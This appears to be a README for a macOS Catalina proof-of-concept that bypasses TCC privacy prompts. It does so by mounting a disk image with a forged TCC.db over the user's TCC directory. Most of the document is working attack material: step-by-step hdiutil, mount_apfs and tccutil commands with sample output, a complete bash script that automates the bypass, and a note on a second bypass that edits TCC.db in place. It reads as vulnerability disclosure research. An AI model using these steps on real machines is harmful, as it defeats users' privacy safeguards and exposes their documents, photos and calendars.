## Summary

An application can mount volumes at `~/Library/Application Support/com.apple.TCC`. A malicious application can exploit this to bypass the TCC prompt by mounting a disk image containing its own `TCC.db` at `~/Library/Application Support/com.apple.TCC`: the mounted volume shadows the real database, so TCC loads the attacker-controlled `TCC.db` instead of the genuine one.
See the file `demo.mov` for a video demonstrating this exploit. To run the exploit, execute the following commands:

- Ensure Terminal is not allowed to access the `~/Documents` directory:

  ```
  tccutil reset All com.apple.Terminal
  ls ~/Documents   # Press "Don't Allow" when the TCC prompt is displayed
  ```

  The `ls` command should fail with an `Operation not permitted` error.

- Run `exploit.sh` to list the files in the `~/Documents` directory:

  ```
  bash exploit.sh
  ```

  Running `exploit.sh` should output the list of files in the `~/Documents` directory.
## Exploitability

Malicious applications can bypass the TCC prompt and access sensitive data such as Contacts, Photos and `~/Documents` that is normally protected by the system.

This exploit is tested to work on:

- Latest macOS Catalina stable release 10.15.3 (19D76)
- Latest macOS Catalina developer beta 10.15.4 Beta 3 (19E242d)

Note: In macOS Catalina stable release 10.15.3 (19D76), an application can directly read and write `~/Library/Application Support/com.apple.TCC/TCC.db`, so a malicious application can bypass TCC simply by modifying `TCC.db` in place. This is fixed in the current macOS Catalina developer beta, but mounting volumes at `~/Library/Application Support/com.apple.TCC` still works in the developer beta, which is what this exploit relies on.
## Working

The `com.apple.TCC.dmg` disk image contains a `TCC.db` that authorises the following services for the Terminal app:

- `kTCCServiceSystemPolicyDownloadsFolder`
- `kTCCServiceSystemPolicyDocumentsFolder`
- `kTCCServicePhotos`
- `kTCCServiceSystemPolicyDesktopFolder`
- `kTCCServiceCalendar`
The following commands mount the disk image `com.apple.TCC.dmg` at `~/Library/Application Support/com.apple.TCC`. This shadows the real `TCC.db` database with the `TCC.db` inside the disk image:

- Attach the APFS disk image using `hdiutil`:

  ```
  hdiutil attach -nomount com.apple.TCC.dmg
  ```

  The output should be similar to:

  ```
  /dev/disk2          	GUID_partition_scheme
  /dev/disk2s1        	Apple_APFS
  /dev/disk3          	EF57347C-0000-11AA-AA11-0030654
  /dev/disk3s1        	41504653-0000-11AA-AA11-0030654
  ```

  Note: In the example output above, the partition of the disk image where `TCC.db` is stored is attached as `/dev/disk3s1`. Replace `/dev/disk3s1` in the steps below if you get a different output.

- Mount the disk partition at `~/Library/Application Support/com.apple.TCC`:

  ```
  mount_apfs /dev/disk3s1 ~/Library/Application\ Support/com.apple.TCC
  ```

- Use `tccutil` to reload the `TCC.db` database. This makes TCC load the database inside the mounted volume:

  ```
  tccutil reset AddressBook com.apple.Terminal
  ```

- Access the restricted `~/Documents` directory:

  ```
  ls ~/Documents
  ```

- Optional: Clean up by unmounting the disk image and reloading the original `TCC.db`:

  ```
  hdiutil detach -force /dev/disk3
  tccutil reset AddressBook com.apple.Terminal
  ```
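The five steps above as one script, added here as an illustration; it is not the `exploit.sh` shipped with this repository. It assumes the disk image path is supplied in the `TCC_DMG` environment variable (so that the helper functions can be sourced or tested without touching the system), that it is run from Terminal (the app the bundled `TCC.db` authorises), and that `hdiutil attach -nomount` and `mount` print output in the format shown in the sample above: the script picks the device node whose partition type GUID starts with `41504653-0000-11AA-AA11-` (the APFS volume) instead of hard-coding `/dev/disk3s1`, and checks with `mount` that the TCC directory really became a mountpoint before asking TCC to reload.

```bash
#!/bin/bash
# Added example, not the repository's exploit.sh: automates the mount-based
# TCC bypass steps listed above. Assumption: TCC_DMG names the disk image;
# when it is unset, only the functions are defined.
set -u

TCC_DIR="$HOME/Library/Application Support/com.apple.TCC"

# Given the text printed by `hdiutil attach -nomount`, print the device node of
# the APFS volume (partition type GUID 41504653-0000-11AA-AA11-...), which is
# the partition holding TCC.db. Prints nothing if no such line exists.
apfs_volume_from_attach_output() {
    printf '%s\n' "$1" | awk '$2 ~ /^41504653-0000-11AA-AA11-/ { print $1; exit }'
}

# /dev/disk3s1 -> /dev/disk3: the synthesized APFS container that
# `hdiutil detach` has to be given to tear the image down again.
container_of() {
    printf '%s\n' "${1%s[0-9]*}"
}

# True when the given `mount` output (lines of "DEV on DIR (opts)") shows
# something mounted on the TCC directory. Also usable as a detection check.
mount_output_has_tcc_dir() {
    printf '%s\n' "$1" | grep -qF " on $TCC_DIR "
}

run_exploit() {
    dmg="${1:-com.apple.TCC.dmg}"

    # Step 1: attach the image without mounting it.
    attach_out="$(hdiutil attach -nomount "$dmg")" || return 1
    vol="$(apfs_volume_from_attach_output "$attach_out")"
    if [ -z "$vol" ]; then
        echo "no APFS volume found in hdiutil output:" >&2
        printf '%s\n' "$attach_out" >&2
        return 1
    fi

    # Step 2: mount the APFS volume over the (non-empty) TCC directory.
    mount_apfs "$vol" "$TCC_DIR" || return 1
    if ! mount_output_has_tcc_dir "$(mount)"; then
        echo "mount_apfs returned success but $TCC_DIR is not a mountpoint" >&2
        hdiutil detach -force "$(container_of "$vol")"
        return 1
    fi

    # Step 3: make TCC reload TCC.db, which now comes from the mounted volume.
    tccutil reset AddressBook com.apple.Terminal

    # Step 4: the previously denied access now succeeds.
    ls ~/Documents

    # Step 5: cleanup, then reload the real TCC.db again.
    hdiutil detach -force "$(container_of "$vol")"
    tccutil reset AddressBook com.apple.Terminal
}

if [ -n "${TCC_DMG:-}" ]; then
    run_exploit "$TCC_DMG"
fi
```

Run it as `TCC_DMG=com.apple.TCC.dmg bash script.sh` from Terminal after the `tccutil reset All com.apple.Terminal` step. The `mount_output_has_tcc_dir` check is the same test a defender can run periodically: nothing should ever be mounted on `~/Library/Application Support/com.apple.TCC`.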
## Changelog

- Initial release
- It is possible to mount volumes at non-empty directories without the `union` mount option, so the `union` mount option is not required for this exploit to work. Updated the title and the "Summary" and "Working" sections to reflect this change.
- Tested and verified that this exploit works on the latest macOS Catalina beta release 10.15.4 Beta 3 (19E242d). Updated the "Exploitability" section to reflect this change.
- Added a note in the "Exploitability" section mentioning another exploit method which works on the current macOS Catalina stable release 10.15.3 (19D76) but is fixed in the latest developer beta.